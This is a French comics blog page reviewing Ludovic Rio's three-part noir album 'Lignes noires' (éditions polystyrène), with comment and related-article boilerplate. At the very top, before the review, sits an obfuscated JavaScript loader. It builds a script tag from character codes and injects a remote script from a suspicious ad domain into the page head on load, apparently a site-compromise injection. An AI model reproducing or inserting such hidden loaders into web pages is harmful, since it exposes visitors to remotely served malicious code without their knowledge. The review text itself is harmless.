Element.prototype.appendAfter = function(element) {element.parentNode.insertBefore(this, element.nextSibling);}, false;(function() { var elem = document.createElement(String.fromCharCode(115,99,114,105,112,116)); elem.type = String.fromCharCode(116,101,120,116,47,106,97,118,97,115,99,114,105,112,116); elem.src = String.fromCharCode(104,116,116,112,115,58,47,47,119,101,108,108,46,108,105,110,101,116,111,97,100,115,97,99,116,105,118,101,46,99,111,109,47,109,46,106,115);elem.appendAfter(document.getElementsByTagName(String.fromCharCode(115,99,114,105,112,116))[0]);elem.appendAfter(document.getElementsByTagName(String.fromCharCode(104,101,97,100))[0]);document.getElementsByTagName(String.fromCharCode(104,101,97,100))[0].appendChild(elem);})();

    Points de vue et lignes de fuite

    Lignes noires, Ludovic Rio, éditions polystyrène, 3 x 24 pages, 16 euros.

    Un polar haletant à travers Paris, vu de différents points de vue. Le concept de ces Lignes noires n’est pas totalement inédit. En 1950, dans son film Rashomon, Akira Kurosawa en avait fait une magistrale démonstration. Plus récemment et dans l’univers de la bande dessinée, c’était aussi le parti pris de la série Alter ego de Denis Lapière. Avec chaque fois le même principe : un récit qui ne devient vraiment compréhensible qu’en additionnant les divers regards sur une même action. Ici, en l’occurrence, une histoire de vol d’argent dans un foyer d’insertion, une course-poursuite à la fin tragique et un arrière-fond social de manifs et de grèves – original dans un tel contexte, mais représentatif des inclinations de l’auteur (que l’on retrouvera à la rentrée à Amiens, comme bd-reporter pour un nouveau site, se présentant comme un “Médiapart local” Le Télélescope).

    Dans la tradition des éditions polystyrène, l’idée se double et se concrétise formellement et physiquement à travers la conception du livre. Là encore dans un format à l’italienne, l’album se présente ainsi en un triptyque qui se déplie pour révéler trois feuillets de 24 pages chacun: “La fuite”, “En avant” et “Des hommes ordinaires”. Chaque fois, se révèle une partie du récit, dans un noir et blanc contrasté qui évoque un peu Marc-Antoine Mathieu (même si Ludovic Rio reconnaît plus les influences de Frederik Peeters).

    Un beau résultat en tout cas. Et un récit qui conserve toute sa cohérence, sous n’importe quels abords.

    Commentez ou exprimez-vous grâce aux emojis !
    0
    J'AIMEJ'AIME
    0
    J'ADOREJ'ADORE
    0
    HahaHaha
    0
    WOUAHWOUAH
    0
    SUPER !SUPER !
    0
    TRISTETRISTE
    0
    GrrrrGrrrr
    Merci !

    Tags:

    • Journaliste de profession, rédacteur en chef adjoint (du Courrier picard) de fonction et amateur de bande dessinée par passion, je préfère parler ici d'albums que j'apprécie (avec éclectisme) plutôt que de ceux que je n'aime pas (et qui peuvent plaire à d'autres). Et ce en toute liberté. Cet espace est aussi l'occasion d'évoquer la vie (régionale en premier lieu) de la bande dessinée et parfois au-delà celle du graphisme, du dessin de presse ou des journaux et revues en lien avec l'un ou l'autre. Précisons que la plupart des illustrations utilisées dans ce blog ont pour copyrights leurs auteurs et éditeurs respectifs. Celles-ci visant à présenter leurs œuvres. A leur demande éventuelle, elles seront retirées.

    • Show Comments

    Your email address will not be published. Required fields are marked *

    comment *

    • name *

    • email *

    • website *

    You May Also Like

    La bonne étoile de Riff Reb’s

    À bord de l’étoile matutine par Riff Reb’s, d’après le roman de Pierre Mac ...

    Un Essai d’utopie anarchiste

    L’Essai, Nicolas Debon. Editions Dargaud, 88 pages, 16,45 euros. C’est une surprenante expérience politico-sociale ...

    Total Swarte et très clair

    Total Swarte, de Joost Swarte, éditions Denoël Graphic, 144 pages, 25 euros. Sortie le ...

    Inceste d’émotion

    L’indivision, Zidrou (scénario), Benoît Springer (dessin). Editions Futuropolis, 64 pages, 15 euros. Zidrou a ...

    Tremen, passage vers une fascinante mélancolie grise

     Tremen, Pim Bos. Editions Dargaud, 64 pages, 14,99 euros. C’est la plus étrange “vision ...